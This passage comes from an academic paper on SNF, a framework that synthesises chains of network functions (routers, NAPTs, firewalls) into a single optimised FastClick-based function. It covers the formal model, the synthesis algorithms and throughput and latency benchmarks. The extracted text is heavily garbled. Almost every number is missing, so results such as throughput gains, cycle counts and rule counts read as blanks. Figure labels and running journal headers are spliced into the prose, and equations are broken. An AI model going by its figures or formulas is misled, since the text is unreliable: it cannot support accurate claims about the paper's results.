approach by dividing a packet according to the unsigned integer value of the different header fields. thus, if p is an ipv /tcp packet, we represent it as: p=(pip_version,pip_ihl,...,ptcp_sport,ptcp_dport,...). katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from now on, we call p the space of all possible packets. for a given header field f of length l bits, we define a field filter ff as a union of disjoint intervals ( , l− ): ff = ⋃ si⊂( , l− ) si where { ∀i, si is an interval ∀i = j, si∩sj =∅. this allows grouping packets into a data structure that we call a packet filter, defined as a logical expression of the form: φ={(p ,...,pn)∈p|(p ∈f )∧...∧(pn∈fn)} where (f ,...,fn) are field filters. the space of all possible packet filters is . then: u : { φ → (f ,...,fn) → {(f ,...,fn)|∀i,fi}(f ,...,fn) is a bijection and we can assimilate φ to (f ,...,fn). if φ and φ are two packet filters defined by their field filters (f , ,...,f ,n) and (f , ,...,f ,n), then φ ∩φ is also a packet filter and is defined as (f , ∩f , ,...,f ,n∩f ,n). network function representation network functions typically apply read and write operations to traffic. while our packet unit representation allows us to compose complex read operations across the entire header space, we still need the means to modify traffic. for this, we define an operation as a function ω :p → that associates a set of possible outputs to a packet. we add the additional constraint that for any given operation ω, there is ω ,...,ωn∈nn such as: ∀p=(p ,...,pn)∈p,ω(p)=(ω (p ),...,ωn(pn)). note that we use sets of possible values (instead of fixed values) to model cases where the actual value is chosen at run-time (e.g., source port in an s-nat). therefore, snf supports both deterministic and conditional operations. if we define � as the space of all possible operations, we can express a processing unit pu as a conditional function that maps packet filters to operations: pu :p →   ω (p) if p∈φ ... ωm(p) if p∈φm where (ω ,...,ωm)∈�m are operations and (φ ,...,φm)∈ m are mutually distinct packet filters. an nf is simply a dag of pus. for instance, snf can express a simplified router’s nf as follows: nfrouter :pu{lookup}→pu{decipttl}→pu{ipchecksum}→pu{mac} with pus: an ip lookup pu is followed by decrement ip ttl, ip checksum update, and source and destination mac address modification pus. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the synthesized network function in the previous section we laid the foundation to construct nfs as graphs of pus. now, at the service level where multiple nfs can be chained, we define a tcu as a set of packets, represented by disjoint unions of packet filters, that are processed in the same fashion (i.e., undergo the same set of synthesized operations). this definition allows us to construct the service chain’s synthesizednf function as a dag of pus, or equivalently, as a map of tcus that associates operations to their packet filters: synthesizednf : →� formally, the complexity of the synthesizednf is upper-bounded by the function o(n·m), where n is the number of tcus and m is the number of packet filters (or conditions) per tcu. each tcu turns a textual packet filter specification (such as ‘‘proto tcp && dst net . / && src port ’’) into a binary decision tree traversed by each packet. therefore, in the worst case, an input packet might traverse a skewed binary tree of the last tcu, yielding the above complexity bound. the average case occurs in a relatively balanced tree (o(logm)), in which case the average complexity of the synthesizednf is bounded by the function o(n·logm). synthesis steps leveraging the abstractions introduced in the ‘abstract service chain representation’ section we detail the steps that translate a set of nfs into an equivalent snf. the snf architecture is comprised of three modules (shown in fig. ). we describe each module in the following sections. service chain configurator the top left box in fig. is the service chain configurator; the interface that a network operator uses to specify a service chain to be synthesized by snf. two inputs are required: a set of service components (i.e., nfs), along with their topology. snf abstracts packet processing by using graph theory. that said, a chain is described as a dag of interconnected nfs (i.e., chain-level dag), where each nf is a dag of abstract packet processing elements (i.e., nf dag). the nf dag is implementation-agnostic, similar to the approaches of bremler-barr, harchol & hay ( ), anwer et al. ( ) and kohler et al. ( ). the network operator enters these inputs in a configuration file using the following notation: vertices (nfs): each service component (i.e., an nf) of a chain is a vertex in the chain-level dag for which, the service chain configurator expects a name and an nf dag specification (see fig. ). each nf can have any number of input and output ports as specified by its dag. an nf with one input and one output interface is denoted as: [interface ]nf [interface ]. edges (nf inter-connections): the connections between nfs are the edges of the chain-level dag. we interconnect two nfs as follows: nf [interface ]→[interface ]nf . no loops: since the chain-level dag is acyclic by construction, snf must prevent loops (e.g., two interfaces of the same nf cannot be connected to each other). entry points: in addition to the internal connections within a chain (i.e., connections between nfs), the service chain configurator also requires the entry points of the chain. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nfchain (pkt,port) discardchain nfk(pkt,port) nfk nf specifications nfknf topology nfm nfl nfl nfm rdnfk wrnfk chain nfs nfm(pkt,port) rdnfm wrnfm nfl(pkt,port) rdnfl wrnfl rdchain decompose read & write operations wrchain state management . traverse synthesized-dag build synthesized-dag of processing units . build service-level traffic class units conditions on header fields single read per traffic class unit single write per traffic class unit early drop after single read . map traffic class units to write operations . generate chain-level nf service chain configurator service chain parser service chain synthesizer figure the snf framework. the network operator inputs a service chain and its topology (top left part). snf parses the chained nfs, decomposes their read and write parts, and composes a synthesized- dag (top right part). while traversing the synthesized-dag, snf builds the tcus of the chain, asso- ciates them with write/discard operations, leading to a synthesized chain-level nf. these points are the interfaces of the chain with the outside world and indicate the existence of traffic sources. an interface that is neither internal nor an entry point can only be an end-point; these interfaces are discovered by the service chain parser as described below. service chain parser the service chain configurator outputs a chain-level dag that describes the chain to the service chain parser. as shown in the top right box of fig. , the parser iterates through all of the input nf dags (i.e., one per nf); while parsing each nf dag, the parser marks each element according to its type. we categorize nf elements in four types: i/o, parsing, read, and write elements. as an example nf, consider a router that consists of interconnected elements, such as readframe, stripethernetheader, iploookup, and decrementipttl. readframe is an i/o element, stripethernetheader is a parsing element (moves a frame’s pointer), iploookup is a read element, while decrementipttl is a write element. the parser stitches together all the nf dags based on the topology graph and builds a synthesized-dag (see fig. ) that represents the entire chain. this process begins from an entry point and searches recursively until an output element is found. if the output element leads to another nf, the parser keeps a jump pointer and cross checks that the encountered interfaces match the interfaces declared in the service chain configurator. after collecting this information, the parser omits the i/o elements because one of snf’s objectives is to eliminate inter-nf i/o interactions. the process continues until an output element that is not in the topology is found; such an element can only be an end-point. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. along the path to an output element the parser separates the read from the write elements and transforms nf elements into pus, according to the ‘network function representation’ section. next, the parser considers the next entry point until all are exhausted. the final output of the service chain parser is a large synthesized-dag of pus that models the behavior of the entire input service chain. service chain synthesizer after building the synthesized-dag, our next target is to create the synthesizednf introduced in ‘the synthesized network function’ section. to do so, we need to derive the snf’s tcus. to build a tcu we execute the following steps: from each entry port of the synthesized-dag, we start from the identity tcu tcu ∈ ×� defined as: tcu =(p,idp), where idp is the identity function of p, i.e.,∀x ∈p,idp(x)=x. conceptually, tcu represents an empty packet filter and no operations, which is equivalent to a transparent nf. then, we search the synthesized-dag, while updating our tcu as we encounter conditional (read) or modification (write) elements. algorithms and build the tcus using an adapted depth-first search (dfs) of the synthesized-dag. now let us consider a tcu t, defined by its packet filter φ and its operation ω, that traverses a pu u using the adapted dfs. the traverse function in algorithm creates a new tcu for each possible pair of (ωi,φi). in particular, it creates a new packet filter φ′ returned by the intersect function (line ). this function is described in algorithm and considers previous write operations while updating a packet filter. for each field filter φi of a packet filter, the function checks whether the value has been modified by the corresponding ωi operation (condition in line ) and whether the written value is in the intersecting field filter φ i (line ). it then updates the tcu by intersecting it with the new filter, if the value has not been modified (action in line ). after the intersect function returns in algorithm , traverse creates a new operation by composing ω and ωi (line ). the recursive algorithm terminates in two cases: (i) when the packet filter of the current tcu is the empty set, in which case the function does not return anything, (ii) when the pu u does not have any successors, in which case it returns the current tcus. in the latter case, the returned tcus comprise the final synthesizednf function. algorithm building the snf tcus : function traverse(t =(φ,ω),u ={(φi,ωi)i≤m}) : for i∈( ,m) do : φ′← intersect(t,φi) : ω′←ωi◦ω : t ′=(φ′,ω′) : traverse(t ′,u.successors[i]) katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm intersecting a tcu with a filter : function intersect(t =(φ,ω),φ ) : φ′←p : (ω ,...,ωn)←ω.coordinates : (φ ,...,φn)←φ.coordinates : (φ ,...,φ n)←φ .coordinates : (φ′ ,...,φ ′ n)←φ ′.coordinates : for i∈( ,n) do : if ωi= idn then φ′i ←φi∩φ i : else : if ωi(φi)⊂φ i then φ ′ i ←φi : elseφ′i ←∅ : return φ′ managing stateful functions a difficulty when synthesizing nf chains is managing successive stateful functions. it is crucial to ensure that the states are properly located in a synthesized nf and that every packet is matched against the correct state table. at the same time, snf should hold the promise that nfv service chains must be realized without redundancy, hence single-read and single-write operations must be applied per packet. to highlight the challenges of maintaining the state in a chain of nfs, consider the example topology shown in fig. . in this example, a large network operator has run out of private ipv addresses in the . / prefix and has been forced to share the same network prefix between two distinct zones (i.e., zones and ), using a chain of napts. this is not unlikely to happen, as an -bit network prefix contains less than million addresses and recent surveys have predicted that billion devices will be connected to the internet by (evans, ). consolidating this chain of nfs into a single snf instance poses a problem. that is, traffic originating from zones and shares the same source ip address and port range, but to ensure that all the traffic is translated properly, the corresponding synthesized chains must share their napt table. however, since traffic also shares the same destination prefix (i.e., towards the same internet gateway), a host from the outside world cannot possibly distinguish the zone where the traffic originates from. obviously, the question that snf has to address in general, and particularly in this example is: ‘‘how can we synthesize a chain of nfs, ensuring that (i) traffic mappings are unique and (ii) no redundant operations will be applied?’’ to solve this conundrum, the snf design respects the following properties: property we enforce the uniqueness of flow mappings by ensuring that all egress traffic that shares the same last stateful (re)write operation also shares the same state table. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. napt napt zone . / zone . / internet figure example of stateful napt chains, where two zones share the same ipv prefix. outbound traffic stateful rw ingress if ingress if egress if egress if egress if inbound traffic classifier classifier classifier classifier classifier ingress if ingress if drop drop stateful rw stateful rw stateful rw stateful rw stateful rw figure state management in snf. property the state table of snf must be origin-aware. to redirect ingress traffic towards the correct interface, while respecting the single-read principle of snf, the snf state table must collocate flow information and the origin interface for each flow. to generalize the state management problem, fig. shows how snf handles stateful configurations with three egress interfaces. we apply ‘‘property ’’ by having exactly one stateful (re)write element (denoted as stateful rw) per egress interface. we apply ‘‘property ’’ by having one input port in each of these (re)write elements, associated with an ingress interface. therefore, a state table in snf not only contains flow-related information, but also links a flow entry with its origin interface. a motivating use case to understand how snf works and what benefits it can offer, we quantify the processing and i/o redundancies in an example use case of an nf chain and then compare it to its synthesized counterpart. we use click to specify the nf dags of this example, but snf is applicable to other frameworks. the example chain consists of a napt, a layer firewall (fw), and a layer load balancer (lb) that process transmission control protocol (tcp) and user datagram protocol (udp) traffic as shown in fig. . the tcp traffic is napt’ed in the first nf and then leaves the chain, while udp is filtered at the fw (the second nf) and the udp datagrams with destination port are katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nf - napt readframe . . . strip ethernet header destination ip lookup . . / → . / → . . . / → read ip address decrement ip ttl ip fragmentation mtu bytes rewrite flow udp->ip_src . . . , port_src - tcp->ip_dst . . . ) encapsulate ethernet src:mac , dst:mac strip ethernet header decrement ip ttl ip fragmentation mtu bytes filter ip traffic allow src ip . . . && udp_dst port , drop the rest encapsulate ethernet src:mac , dst:mac strip ethernet header decrement ip ttl ip fragmentation mtu bytes rewrite flow apply round-robin (rr) to dst ip addresses . . . , . . . encapsulate ethernet src:mac , dst:mac nf - l fw nf - l lb writeframe classify ip traffic udp, tcp, drop readframe . . . writeframe writeframe readframe . . . domain . / domain . / figure the internal components of an example napt - l fw - l lb chain. load balanced across two servers by the last nf. for simplicity, we discuss only the traffic going in the direction from the napt to the lb. the rectangular operations in fig. are interface-dependent, e.g., an ‘‘encapsulate ethernet’’ operation encapsulates the ip packets in ethernet frames before passing them to the next nf where a ‘‘strip ethernet header’’ operation turns them back into ip packets. such operations occur times because there are nfs, instead of only once (because the processing operates at the ip layer). ideally, strip should be applied before, and ethernet encapsulation after all of the ip processing operations. similarly, the ‘‘ip fragmentation’’ should only be applied before the final ethernet encapsulation. the remaining operations (illustrated as rounded rectangles) of the three processing stages are those that (i) make decisions based upon the contents of specific packet fields (read operations with a solid round outline, e.g., ‘‘classify ip traffic’’ and ‘‘filter ip traffic’’) or katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. rewrite flow ip_dst: . . . classify ip traffic ● rewrite a traffic class at once. ● keep state. strip ethernet header encapsulate ethernet src:mac ,dst:mac readframe . . . writeframe to . / early discard rewrite flow synthesized read operations synthesized write operations udp dst tcp all ip_src: . . . , ip_dst: rr( . . . / . . . ), port_src: - ip fragmentation mtu bytes a unique set of header fields for each traffic class. x decrement ip ttl ip/udp checksum once ip checksum once x decrement ip ttl packets to be dropped pass only through the read stage. encapsulate ethernet src:mac ,dst:mac writeframe to . / ip fragmentation mtu bytes figure the synthesized chain equivalent to fig. . the snf contributions are shown in floating text. (ii) modify the packet header (rewrite operations with a blue dashed outline e.g., ‘‘rewrite flow’’ and ‘‘decrement ip ttl’’). we found redundancy in both types of operations. in the read operations, one ip classifier is sufficient to accommodate the three traffic classes of this example and perform the routing. thus, all the round-outlined operations with solid lines (green) can be replaced by a single ‘‘classify ip traffic’’ operation. large savings are also possible with the rewrite operations. for example, the initial chain calculates the ttl field times and ip checksum times, whereas only one computation for these fields suffices in the synthesized chain. based on our measurements on an intel xeon e processor the checksum calculations cost – cpu cycles/packet. by integrating the ‘‘decrement ip ttl’’ into the ‘‘rewrite flow’’ operation and enforcing the checksum calculation only once, saves cpu cycles/packet. figure depicts a synthesized version of the nf chain shown in fig. . following the snf paradigm presented in the ‘snf architecture’ section, the synthesized chain forms a graph with two main parts. the left-most part (rounded rectangles with solid outline in fig. ) encodes all the read operations by composing paths that begin from a specific interface and traverse the three traffic classes of this chain, until a packet is output or dropped. each path keeps a union of filters that represents the header space that matches the respective traffic class. in this example, the filter for e.g., the allowed udp packets is the union of the protocol and destination port numbers. such a filter is part of a classifier whose output port is linked with a set of write operations (dashed vertices in fig. ) associated with this traffic class (right-most part of the graph). as shown in fig. , with snf a packet passes through all the read operations once (guaranteeing a single-read) and either the packet is discarded early or each header field is written once (ensuring a single-write) before exiting the chain. synthesizing the counterpart of this example implies several code modifications to avoid the redundancy caused by the design of each nf. to apply a per flow, per-field single-write operation we ensure that the ‘‘rewrite flow’’ will only calculate the checksums once ip addresses, ports, and the ip ttl fields are written. therefore, in this example we saved four unnecessary operations ( ‘‘decrement ip ttl’’ and ‘‘rewrite flow’’) and four checksum katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. calculations ( ip and ip/udp). moreover, integrating all decisions (i.e., routing and filtering) in one classifier caused the classifier to be slightly heavier, but saved another two redundant function calls to ‘‘destination ip lookup’’ and ‘‘filter ip traffic’’ respectively. the final form of the synthesized chain requires only processing operations to transfer the udp datagrams along the entire chain. the initial chain implements the same functionality using processing operations and two additional pairs of i/o operations. based on our measurements the total processing cost of the initial chain is cycles/packet, while the synthesized chain requires × less (roughly ) cycles/packet. if we account for the extra i/o cost per hop for the initial chain the difference becomes even greater. in production service chains, where packets arrive at high rates, this overhead can play a major role in limiting the throughput of the chain and the imposed latency; therefore, the advantages of synthesizing more complex service chains than this simple use case are expected to be even greater. implementation as we stated earlier, snf’s basic assumption is that each input service component (i.e., nf) is expressed as a graph (i.e., the nf dag), composed of individual packet processing elements. this allows snf to parse the nf dag and infer the internal operations of each nf, producing a synthesized equivalent. among the several candidate platforms that allow such a representation, we developed our prototype atop click because it is the most widely used nfv platform in the academia. many earlier efforts built upon it to improve its performance and scalability, hence we believe that this choice will maximize snf’s impact as it allows direct comparison with state of the art click variants such as routebricks (dobrescu et al., ), packetshader (han et al., ), double-click (kim et al., ), snap (sun & ricci, ), clickos (martins et al., ), and fastclick (barbette, soldani & mathy, ). we adopt fastclick as the basis of snf as it uses dpdk, a state of the art user-space i/o framework that exploits modern hardware amenities (including multiple cpu cores) and nic features (including multiple queues and offloading mechanisms). along with batch processing, non-uniform memory access support, and fine grained cpu core affinity techniques, fastclick can realize a single router achieving line-rate throughput at gbps. snf aims for similar performance for an entire service chain. fastclick extensions we implemented snf in c++ . the modules depicted in fig. are , lines of code. the integration with fastclick required another , lines of code (modifications and extensions). although fastclick improves a router’s throughput and latency, it lacks features required for broader nfv applications; therefore, we made the following extensions to target a service-oriented platform: extension : stateful elements that deal with flow processing such as ip/udp/tcprewriter were not originally equipped with fastclick’s accelerations such as computational batching or cache prefetching. moreover, these elements were not designed to be thread-safe, hence they could cause race conditions when accessed by multiple cpu cores at the same time. we katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this extension is not a direct part of fastclick, since the compressed classification rules are computed by snf beforehand; then, snf uses these rules as arguments when calling fastclick’s classifier or ipclassifer elements. designed thread-safe data structures for these elements, while also applying the necessary modifications to equip them with the fastclick accelerations. extension : we tailored several packet modification fastclick elements to comply with the synthesis principles, as we found that their implementation was not aligned with our single-write approach. for instance, we improved the ip/udp/tcp checksum calculations by calling the respective functions only once all the header field modifications are applied. moreover, we extended the ip/udp/tcprewriter elements with additional input arguments. these arguments extend the elements’ packet modification capabilities (e.g., decrement ip ttl field to avoid unnecessary element calls) and guarantee that a packet entering these elements undergo a single-write operation per header field. extension : we developed a new element, called ipsynthesizer, in the heart of our execution model shown in fig. . this element implements per-core stateful flow tables that can be safely accessed in parallel allowing multiple tcus to be processed at the same time. to avoid inter-core communication, thus keeping the per-core cache(s) hot, we extended the rss mechanism of dpdk (see fig. ) using a symmetric approach proposed by woo & park ( ). extension : to make software-based classification more scalable, we implemented the lazy subtraction algorithm introduced in header space analysis (hsa) (kazemian, varghese & mckeown, ). with this extension, snf aggregates common ip prefixes in a filter and applies the longest one while building a tcu, thus producing shorter traffic class expressions. our prototype supports a large variety of packet processing libraries, fully covering both native fastclick and hypervisor-based clickos deployments. our prototype also takes advantage of fastclick’s computation batching with a processing core moving a group of packets between the classifier and the synthesizer with a single function call. new packet processing elements can be incorporated with minor effort. we made the fastclick extensions available at katsikas ( ). performance evaluation recent efforts, such as clickos (martins et al., ) and netvm (hwang, ramakrishnan & wood, ), are unable to maintain constant high throughput and low latency for chains of more than nfs when processing packets at high speed. this problem hinders large-scale hypervisor-based nfv deployments that could reduce network operators’ expenses and provide more flexible network management and services (cisco, ; sdx central, ). we envision snf to be the key component of future nfv deployments, thus we evaluate the synthesis process using real service chains to exercise its true potential. in this section, we demonstrate snf’s ability to address three types of service chains: chain : scale a long series of routers at the cost of a single router. chain : nest multiple napt middleboxes. chain : implement high performance acls of increasing cardinality at the borders of isp networks. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we use the experimental setup described in the ‘testbed’ section to measure the performance of the above three types of chains and answer the following questions: can we synthesize (stateful) chains without sacrificing throughput as we increase the chain length (see the ‘a chain of routers at the cost of one’ section and the ‘stateful service chaining’ section)? what is the effect of different packet sizes on a system’s throughput (see the ‘stateful service chaining’ section)? what are the current limits of purely software-based packet processing (see the ‘real service chain deployments’ section) and how can we overcome them (see the ‘hardware-accelerated snf’ section)? testbed we conducted our experiments on six identical machines each with a dual socket -core intel r© xeon r© cpu e - v clocked at . ghz. the cache sizes are: × kb l , kb l , and mb l . hyper-threading is disabled and the os is the ubuntu . . distribution with linux kernel v. . . each machine has two dual-port gbe intel es nics. unless stated otherwise, we use two machines to generate and sink bi-directional traffic using moongen (emmerich et al., ), a dpdk-based traffic generator. moongen allows us to saturate gbps nics on a single machine using a set of cores, while receiving the same amount of traffic on another set of cores. to gain insight into the performance of the service chains, we measure the throughput and end-to-end latency to traverse the chains, at the endpoints. we use fastclick as a baseline and compare fastclick against snf (which extends fastclick). we create service chains that run natively in a single process using rss and multiple cpu cores, as this is the fastest fastclick configuration. we follow two different setups for our software-based and hardware-assisted deployments as follows: software-based snf: in the ‘a chain of routers at the cost of one,’ ‘stateful service chaining,’ and ‘real service chain deployments’ sections we stress different purely software- based nfv service chains that run in one machine following the execution model of fig. . this machine has gbe nics connected to the two traffic source/sink machines (two nics on each machine), hence the total capacity of the nfv machine is gbps. the goal of this testbed is to show how much nfv processing fastclick and snf can fit into a single machine and what processing limits this machine has. hardware-assisted snf: for the complex nfv service chains, presented in the ‘real service chain deployments’ section, we deployed a testbed (see the ‘hardware-accelerated snf’ section) where we offload the traffic classification to a noviflow openflow switch with firmware version . . . the switch is connected to two gbe nics via each of the two senders/receivers, and with one link to each of the four processing servers in our snf cluster. this testbed has a total of gbps capacity (same as the software-based setup above), but the processing is distributed to more machines in order to show how our snf system scales. a chain of routers at the cost of one this first use case targets a direct comparison with the state of the art. specifically, we chain a popular implementation of a software-based router that, after several years of successful katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. t h ro u g h p u t (g b p s) number of chained nfs routers - snf (batch ) throughput(gbps):mean( . ),std( . ) napts - snf (batch ) throughput(gbps):mean( . ),std( . ) napts - snf (batch ) throughput(gbps)= - . ·nfs + . ,r = . routers - fastclick (batch ) throughput(gbps)=+ . ·nfs - . ·nfs+ . napts - fastclick (batch ) throughput(gbps)=+ . ·nfs - . ·nfs+ . figure throughput (gbps) of chained routers and napts using (i) fastclick and (ii) snf versus the numbers of chained nfs ( -byte frames are injected at gbps). bigger batch sizes achieve higher throughput. research contributions (dobrescu et al., ; han et al., ; kim et al., ; sun & ricci, ; martins et al., ; barbette, soldani & mathy, ), achieves scalable performance at tens of gbps. as we show in this section, a naive chaining of individual, fast nfs does not achieve high performance. to quantify this we linearly connect – fastclick routers, where each router has four gbps ports (hence such a chain has a gbps link capacity). the down-pointing (green) triangular points in fig. show the throughput achieved by these chains versus the increasing length of the chains, when we inject -bytes frames, excluding the cyclic redundant check (crc). the maximum throughput for this frame size is . gbps and this is the limit of our nics, as reported earlier (barbette, soldani & mathy, ). in our experiment, fastclick can operate at the maximum throughput only for a chain of or routers. as denoted by the equation’s fit to the graph, after this point there is a quadratic throughput degradation, that results in a chain of routers achieving less that gbps of throughput. snf automatically synthesizes this simple chain (shown with red squares) to achieve the maximum possible throughput of this hardware, despite the increasing length of the chain. the fitted equation confirms that snf operates at the speed of the nics. stateful service chaining the problem of service function chaining has been recently investigated by quinn & nadeau ( ) and several relevant use cases (liu et al., ) have been proposed. in some of these use cases, traffic needs to support distinct address families while traversing different networks. for instance, within an isp, ipv /ipv traffic might either be directed to a nat (bagnulo, matthews & van beijnum, ) or a carrier grade nat (perreault et al., ). in more extreme cases, this traffic might originate from different access networks, katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. t h ro u g h p u t (g b p s) frame size without crc (bytes) snf routers (batch ) snf napts (batch ) snf napts (batch ) fastclick routers (batch ) fastclick napts (batch ) figure throughput of routers and napts chained using (i) fastclick and (ii) snf versus the frame size in bytes (without crc). the different frames are injected at gbps. such as fixed broadband, mobile, datacenters, or cloud customer premises, thus causing the nested nat problem (penno, wing & boucadair, ). the goal of this use case is to test snf in such a stateful context using a chain of – napts. each napt maintains a state table that stores the original and translated source and destination ip addresses and ports of each flow, associated with the input interface where a flow was originated. the rhomboid points of fig. show that the chains of fastclick napts suffer a steeper (according to the fitted equation) quadratic degradation than the fastclick routers. although we extended fastclick to support thread-safe, parallelized napt operations across multiple cores, it is still unable to drive the napt chain at line-rate, despite using cpu cores and -packet batches. snf requires a certain batch size to realize the synthesized napt chains at the speed of hardware as shown by the black circles of fig. . the curve with the up-pointing (blue) triangles indicates that a batch size of packets leads to a slight throughput degradation after the th napt in the chain. state lookup and management operations executed for every packet cause this degradation. depending on the performance targets, a network operator might tolerate an increased latency to achieve the higher throughput offered by an increased batch size. next, we explore the effect of different frame sizes on the chains of routers and napts. we run the longest chain (i.e., nfs) for frame sizes in the range of [ , , ] bytes. figure shows that snf follows the nics’ performance and achieves line-rate forwarding at gbps for frames greater than bytes. fastclick only achieves up line-rate performance for frame sizes greater than – , bytes. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. router napt internet fw isp network . / inbound traffic outbound traffic intra-isp traffic figure an isp’s service chain that serves inbound and outbound internet traffic as well as intra-isp traffic using three nfs. real service chain deployments another common use case for an isp is to deploy a service chain of a fw, a router, and a napt as depicted in fig. . the fw of such a chain may contain thousands of rules in its acl causing serious performance issues for software-based nf implementations. in this section we measure the performance of snf using actual fw configurations of increasing cardinality and complexity, while exploring the limits of software-based packet processing on our hardware. we utilize a set of three actual acls (taylor & turner, ), taken from several isps, to deploy the service chain of fig. . the fw implements one acl with , , or , entries. the second nf is a standards-compliant ip router that redirects packets either towards the isp’s domain (intra-isp traffic with prefix . . . / ) or to the internet. for the latter traffic, the third nf interconnects the isp with the internet by performing source and destination napt. we use the above acls to generate traces of -byte frames that systematically exercise all of their entries. the generated packets emulate intra-isp, inbound and outbound internet traffic (see fig. ). figure presents the performance of the chains versus the different frames sizes ( , , , and , bytes). we implemented the chains in fastclick and a purely software-based snf using the full capacity of our processor’s socket (i.e., cores in one machine), symmetric rss, and a batch size of packets. figure a shows that the small acl ( rules), executed as a single fastclick instance, achieves satisfactory throughput, equal to its synthesized counterpart. this indicates that a small isp or a chain deployment in small subnets (e.g., using links with capacity equal or less than gbps) may not fully benefit from snf. as depicted in fig. b, the latency is also bounded below µs. this time is dominated by the fact that our traffic flows as follows: traffic originating from one machine enters an snf server and, after being processed, sent back to the origin server. we believe that the observed latency values are realistic for such a topology. however, for the acls with and , rules the combination of all possible traffic classes among the fw, router, and napt boxes causes the classification tree of the chain katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure system’s performance versus frame sizes ( , , , and , bytes) of three different isp-level chains with , , and , rules in their acls. fastclick and snf implement these chains in software using cpu cores (in a single machine with four nics), symmetric rss, and batch size of packets. input rates are gbps for the throughput test and gbps for the latency test. to explode in size, hence synthesis is a powerful yet necessary solution. this causes three problems for fastclick: (i) the throughput when executing the last two acls ( , and , rules) is reduced by almost . ×– × respectively (on average), (ii) the median latency of the largest acl is at least an order of magnitude greater than the median latencies of the smaller acls (see fig. b), and consequently (iii) the th percentile of the latency increases (up to almost ms). in contrast, snf effectively synthesizes the large acls (i.e., and , rules) maintaining high throughput despite their increasing complexity. in the case of rules, the synthesis is so effective that leads to better throughput than the -rule case. regarding latency, snf demonstrates . – × lower median latency (bounded below µs) and – . × lower latency variance (slightly above ms in some cases). the throughput gain of snf is up to . × greater than the fastclick chains. hardware-accelerated snf the results presented in the previous section show that software-based snf cannot handle packet processing at a high enough rate when the nfs are complex. we analyzed the root cause and concluded that the packet classifier (that dispatches incoming packets to synthesized nfs) is the bottleneck. to overcome this problem, we run additional experiments, in which we offload packet classification to a hardware openflow switch (since commodity nics do not offer sufficient programmability). by doing so, we showcase snf’s ability to scale to high data rates with realistic nfs. in addition, we hint at the performance that is potentially achievable by offloading packet classification to a programmable interface. throughput measurements this extended version of snf includes a script that converts the classification rules computed by the original snf to openflow . rules. the translation is not straightforward because the switch rules are less expressive than the rules accepted by the nfs. specifically, rules that match on tcp and udp port ranges are problematic. while openflow allows only matches on concrete values of ports, naive unrolling of ranges into multiple openflow katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure hardware-assisted snf’s performance versus frame sizes ( , , , and , bytes) of three different isp-level chains with , , and , rules in their acls. snf’ s classification is of- floaded to an openflow switch, while stateful processing occurs in servers connected to the switch. in- put rates are gbps for the throughput test and gbps for the latency test. matches leads to an unacceptable number of rules. instead, we solve the problem by utilizing a pipeline of flow tables available in the switch. the first two tables match only on the source and destination ports respectively, assign them to ranges, and write metadata that defines the range. further tables include the real acl rules and also match on the metadata previously added to a packet. moreover, since the rules in the nfs are explored in a top-to-bottom order, we emulate the same behavior by assigning decreasing priorities to the openflow rules. we use the same sets of acls as before, and evaluate throughput and latency in the hardware-accelerated snf. we first measure the throughput that snf can achieve leveraging openflow classification. we design an experiment where two machines use a total of four gbps links to send traffic. the packets are crafted so that they uniformly exercise all visible classification rules (some rules from the original data set are fully covered by other rules). we use the same frame sizes as in the ‘real service chain deployments’ section. the switch classifies the packets and forwards them across four snf servers that are using gbps links to connect to the switch. the servers work in two modes: (i) forward only, where they do not implement any nfs and simply forward packets (the first bar in each pair in fig. (a), and (ii) synthesized mode, where they implement the real nf chain (the second bar in each pair in fig. (a). additionally, for comparison, we created an experiment where the switch installs only four basic classification rules (to do simple forwarding) to measure the performance of the nfs themselves (the last pair of bars in fig. (a). we observe that throughput depends mostly on the frame size. the system can operate at almost gbps for small frames (i.e., bytes), and it reaches the full line-rate for -byte frames. interestingly, the rule set size does not affect the throughput. in the real data sets, the second bar in each pair is almost as high as the first one, which shows that the software part of snf does not limit the performance. finally, with simple forwarding rules in the switch (the first pair of bars in fig. (a) the overall throughput is high even for small frames, which confirms that packet processing at the switch is the katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bottleneck of the whole system. to further prove this point, we run an experiment with only ports sending traffic at an aggregate speed of gbps. in this case, snf processes packets at the line-rate except for the smallest frames, where it achieves gbps. latency measurements a middlebox chain should induce low, bounded packet processing delays. in this set of experiments, we send traffic at a lower rate and measure latency. the setup is the same as in the previous scenario. thus, the latency we show includes the time for frames to be: (i) transmitted out of the network interface of the traffic generating machines, (ii) received, processed, and forwarded by the openflow switch, (iii) received, processed, and forwarded by the snf machines, and (iv) received by the destination server (the same machine as the sender). figure b shows the latency depending on the frame size and the synthesized function (results for the input rate of gbps are very similar). our results show that the median latencies are low and stable across all frame sizes and chains. there are several main observations here. first, the th percentiles (marked by the top 